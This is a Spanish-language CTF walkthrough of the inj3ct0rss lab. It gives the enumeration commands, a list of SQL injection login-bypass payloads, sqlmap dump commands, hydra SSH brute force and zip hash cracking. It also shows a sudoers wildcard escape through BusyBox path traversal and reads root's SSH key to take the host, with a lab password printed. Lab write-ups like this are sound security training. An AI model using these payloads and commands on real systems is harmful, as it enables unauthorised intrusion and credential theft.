inj3ct0rss - Medium

Este documento narra la metodología y los pasos seguidos para comprometer este ctf llamado inj3ct0rss

Reconocimiento y Enumeración

Arrancamos realizando un reconocimiento inicial sobre el host objetivo para identificar qué servicios se encuentran expuestos.

Para ello ejecutamos un escaneo completo de puertos con Nmap, ignorando comprobaciones de ICMP (-Pn) y habilitando salida detallada (-vv):

nmap -Pn -vv -p- 172.17.0.2

El resultado nos revela que los puertos 22/tcp (SSH) y 80/tcp (HTTP) están abiertos, lo cual establece los primeros vectores de ataque disponibles.

A partir de esta información, procedemos a un escaneo de detección de versiones y scripts comunes de enumeración (-sCV) con el fin de obtener detalles sobre los servicios en ejecución:

nmap -Pn -sCV -vv -p22,80 172.17.0.2

Esta fase nos permite identificar tecnologías, versiones específicas y posibles puntos débiles que podremos explotar más adelante, tanto en el servicio web como en el acceso SSH.

En el mismo hay un mensaje donde se nos da la bienvenida a un portal que nos explicara las caracteristicas del CTF que pondra a prueba nuestras habilidades

Sqlinjection
Exploit de vulnerabilidades web
Criptografia y esteganografia
Escalamiento de privilegios

Realizamos deteccion de las tecnologias empleadas por la web

whatweb http://172.17.0.2

http://172.17.0.2 [200 OK] Apache[2.4.58], Country[RESERVED][ZZ], HTML5, 
HTTPServer[Ubuntu Linux][Apache/2.4.58 (Ubuntu)], IP[172.17.0.2], 
Title[Inj3ct0rs CTF - Página Principal]

Para descubrir archivos olvidados, backups, endpoints no listados

Rutas
gobuster dir -u http://172.17.0.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -t 20 --add-slash

Archivos
gobuster dir -u http://172.17.0.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -t 20 -x php,php.back,backup,txt,sh,html,js,java,py

ACCESO INICIAL (Explotación Web / SQLi)

Firefox 172.17.0.2/login.php

De forma manual pruebo algunas SQLQueryes para intentar bypassear el panel de login

'
"
admin'
admin"
admin'--
admin"--
admin'#
admin"#
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'-- -
admin' or '1'='1'#
admin' or '1'='1'/*
admin' or true-- -
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'-- -
admin' or sleep(5)-- -
admin' or 1=1 limit 1-- -
admin' or '1'='1' limit 1-- -

Despues de probar algunos payloads logro tener exito con

admin' or sleep(5)-- -

Al tener exito nos redirige a: http://172.17.0.2/content_pages_hidden/welcome.php

Sabiendo que el login es vulnerable a inyeccion SQL usaremos la herramienta SQLMap para automatizar la inyeccion.

Primero interceptamos la solicitud para luego realizar un descrubrimiento sobre las bases de datos:

sqlmap -r r --dbs --batch

information_schema
injectors_db
mysql,performance_schema
sys

Tablas de: injectors_db

sqlmap -u "http://172.17.0.2/content_pages_hidden/db.php" \ --data="username=asda&password=aaaaad" \ --method=POST \ --batch \ -D injectors_db \ --tables

Columns

sqlmap -u "http://172.17.0.2/content_pages_hidden/db.php" \ --data="username=asda&password=aaaaad" \ --method=POST \ --batch \ -D injectors_db \ -T users \ --columns

Dump:

sqlmap -u "http://172.17.0.2/content_pages_hidden/db.php" \ --data="username=asda&password=aaaaad" \ --method=POST \ --batch \ -D injectors_db \ -T users \ --dump

MOVIMIENTO LATERAL

Probamos las credenciales con ssh que se aloja en el puerto 22:

hydra -L users.txt -P passwords.txt -f ssh://172.17.0.2

Ahora miraremos en este directorio no_mirar_en_este_directorio:

Lo descargamos y al intentar descomprimir el archivo nos pide una contrasena que no tenemos

Asi que realizaremos un ataque de fuerza bruta para descubrir la clave que nos permita descomprimir el archivo:

zip2john secret.zip > hash 

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Ahora volvemos a descomprirmir el archivo ya con la contrasena:
7z x secret.zip

Ahora si logramos que se descomprima y leer el contenido obteniendo credenciales de ralf

ralf:supersecurepassword

Ya contando con otras credenciales para el usuario ralf, probamos nuevamente la conexion via ssh

ssh ralf@172.17.0.2 

Después de obtener acceso inicial al sistema como un usuario de bajo privilegio, el siguiente paso lógico es identificar qué capacidades adicionales posee este usuario dentro del sistema. Una de las formas más directas de detectar rutas potenciales de escalada es revisar los comandos permitidos por la política de sudoers.

Este análisis permite determinar:

• si el usuario puede ejecutar ciertos comandos con sudo,

• si esos comandos requieren o no contraseña,

• a qué usuario puede impersonar (incluido root),

• y si existen restricciones aplicadas, como rutas limitadas, binarios específicos o uso de comodines.

Con esta información es posible identificar configuraciones débiles que permitan ejecutar binarios privilegiados, escapar entornos restringidos o incluso obtener acceso total como root.

sudo -l

ralf puede ejecutar BusyBox como el usuario “capa” sin contraseña
capa : capa  el comando se ejecuta como el usuario capa
NOPASSWD:  no requiere contraseña

/usr/local/bin/busybox /nothing/*:
solo permite ejecutar BusyBox dentro del directorio /nothing/

Hasta ahí, parece un permiso limitado. Pero BusyBox es un arma multiuso.

BusyBoxs

BusyBox es un binario monolítico que contiene decenas de utilidades Unix, incluyendo sh. Cuando lo ejecutás de forma privilegiada, podés invocar cualquiera de sus “applets”.

El administrador intentó restringir el binario usando un wildcard:

/usr/local/bin/busybox /nothing/*
Pero este patrón no evita que el atacante manipule la ruta para ejecutar otros binarios.

El sudoers solo controla el prefijo, no el contenido expandido del wildcard. Por lo tanto, se puede escapar del directorio /nothing/ usando:

/nothing/../../usr/bin/sh

Cuando sudo expande el comodín *, no valida que la ruta final siga dentro de /nothing/.

Esto permite ejecutar un sh real (no restringido) como el usuario “capa”:

sudo -u capa /usr/local/bin/busybox /nothing/../../usr/bin/sh

Una vez dentro del sistema con una shell real como el usuario capa, el control del entorno ya no está restringido por el wildcard /nothing/*

A este nivel, podemos ejecutar cualquier comando permitido para este usuario dentro de la política sudoers.

Al revisar nuevamente las capacidades de sudo para capa

Encontramos que este usuario tiene permisos excesivos que le permiten ejecutar el binario /bin/cat como root, sin necesidad de contraseña. Esto convierte la shell de capa en un punto de pivot ideal para acceder a información sensible

Primero leemos el archivo encontrado en el directorio /home de capa obteniendo su contraseña

Entre los archivos accesibles como root se encuentra:

sudo -u capa /usr/local/bin/busybox /nothing/../../usr/bin/sh

/root/.ssh/id_rsa

sudo -u root /bin/cat /root/.ssh/id_rsa

Asi obtenemos la clave rsa del usuario root con el cual podremos logrearnos en el protocolo ssh con privilegios

COMPROMISO TOTAL

Le damos los permisos necesarios

chmod 600 id_rsa

Asi obtenemos la clave rsa del usuario root con el cual podremos logrearnos en el protocolo ssh con privilegios

sudo -u capa /usr/local/bin/busybox /nothing/../../usr/bin/sh

ssh -i id_rsa root@localhost o ssh -i id_rsa root@172.17.0.2

pwned!!!

Regresamossss